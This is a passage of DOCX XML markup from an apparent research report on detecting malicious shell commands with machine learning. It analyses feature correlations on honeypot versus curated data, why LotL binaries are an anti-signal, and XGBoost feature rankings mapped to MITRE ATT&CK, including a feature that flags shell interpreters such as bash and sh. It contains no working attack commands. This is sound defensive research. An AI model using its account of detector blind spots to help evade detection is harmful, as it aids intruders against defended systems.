              </w:rPr>
              <w:t>0.32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.106</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>benign</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The benign-leaning column of that table is the finding with the deepest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>modeling consequences, and it splits into two mechanisms. Part is genuine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sign inversion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> relative to Dataset 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (r +0.247 there →</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">−0.171 here), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_quotes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.081 → −0.112), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_flags</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.051 → −0.125)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>all leaned attack on the curated corpus and flip decisively benign on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">operational data. The rest is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>reinforcement rather than reversal</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_lotl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (a command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>led</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by a living-off-the-land binary) was already a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>faint benign hint on Dataset 1 (r −0.046) and is ten times more common in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">benign traffic here (13.1% vs 1.3%, r −0.118), with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_lotl_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_pipes</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">and the newly significant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_long_flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pointing benign on both corpora.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The explanation is the benign pool, not the attacks: real administrators</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">piping </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xargs</w:t>
      </w:r>
      <w:r>
        <w:t>, quoting commit messages, and stacking long flags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>produce exactly the shell plumbing and LotL vocabulary that a curated benign</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>corpus underrepresents, while Cowrie's scripted attackers issue terse,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">flagless probes. Two consequences follow. Mere </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>presence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of LotL vocabulary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>is an anti-signal on both datasets — detection cannot ride on which binary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>appears, only on how it is used. And a model trained on Dataset 1 — where</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>length, quoting, and flag density lean attack — meets the opposite conditional</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>distribution here, which is the feature-level mechanism behind the D1→D2 F1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>collapse; the cross-dataset distribution-shift analysis in Chapter 5.2 builds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>directly on these pairs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The correlation heatmap (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch3_corr_heatmap_dataset2.png</w:t>
      </w:r>
      <w:r>
        <w:t>) shows a redundancy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>structure that is real but bounded, with no leakage-grade pairing. The</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">strongest correlation is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at +0.906 — the familiar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>"how big is this command" cluster Ben flagged on Dataset 1, joined by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mean_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.783) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_quotes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(+0.706) — and the by-construction family pairs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_*_bin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(+0.716 to +0.816; a command headed by an interpreter necessarily contains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">one). Two pairs are informative rather than nuisance: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_token_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ~</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>b64_run_len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.743) says the longest tokens </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the encoded blobs when</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">they occur, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_fetch_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (+0.675) says URLs arrive almost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>exclusively inside fetch commands — the download-cradle conjunction itself.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nothing exceeds 0.91 and nothing approaches the ≥0.95 near-duplicate band, so</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>no feature is dead weight; tree ensembles tolerate this level of collinearity,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and the linear/distance-based stages see it only after the in-pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>standardization (Ch5.3). The honest leakage caveat is distributional rather</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">than structural: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_ipv4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> earn part of their</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset-2 strength from Cowrie campaigns hard-coding C2 addresses — a corpus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>property, not a property of malice — so their prominence here should be read</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>as "strong on this telemetry," not "strong in general," a caution Chapter 8's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>transfer results vindicate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Three takeaways carry into modeling. First, Dataset 2's signal is *wider and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>flatter* than Dataset 1's: with a top effect of 0.234 and 35 significant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>features, no small feature subset will carry the classifier, and the ceiling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>on engineered-feature models is visibly lower — consistent with every model's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>D2 holdout trailing its D1 counterpart (RF 0.758 vs 0.801 in the Ch7 grids;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Isolation Forest ranking AUC 0.677 vs 0.812). Second, the direction reversals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>between the two datasets are not noise but a structural property of operational</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>telemetry: any feature whose sign flips between corpora (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_quotes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_flags</w:t>
      </w:r>
      <w:r>
        <w:t>) is a feature a cross-domain model must not lean on,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and their combined weight in-domain explains why in-domain excellence coexists</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>with transfer collapse. Third, the class-imbalance remedy is unchanged — the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1:3 prevalence is identical by construction — but the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>benign</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> side is where</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 2 is hard: its benign traffic is adversarially close to attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>vocabulary (admin LotL usage), which shifts the burden from detecting exotic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>attack tokens to modeling conjunctions, exactly the regime where the hybrid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>lexical+engineered representation earns its keep.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:br w:type="page"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 4 — Feature Ranking Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>XGBoost gain-based importance quantifies how much each engineered feature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>reduces training loss across every split it participates in — a direct measure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>of the discriminative signal the model actually leans on, not merely how often a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">feature appears. Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch4_feature_importance_dataset1.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ranks the top 20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>engineered features for Dataset 1; the leaders and their MITRE ATT&amp;CK mappings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>are summarized below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Top 5 Dataset 1 features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Rank</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Gain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>What it measures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK tactic → technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>shell_bins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.194</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Presence of a shell interpreter (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
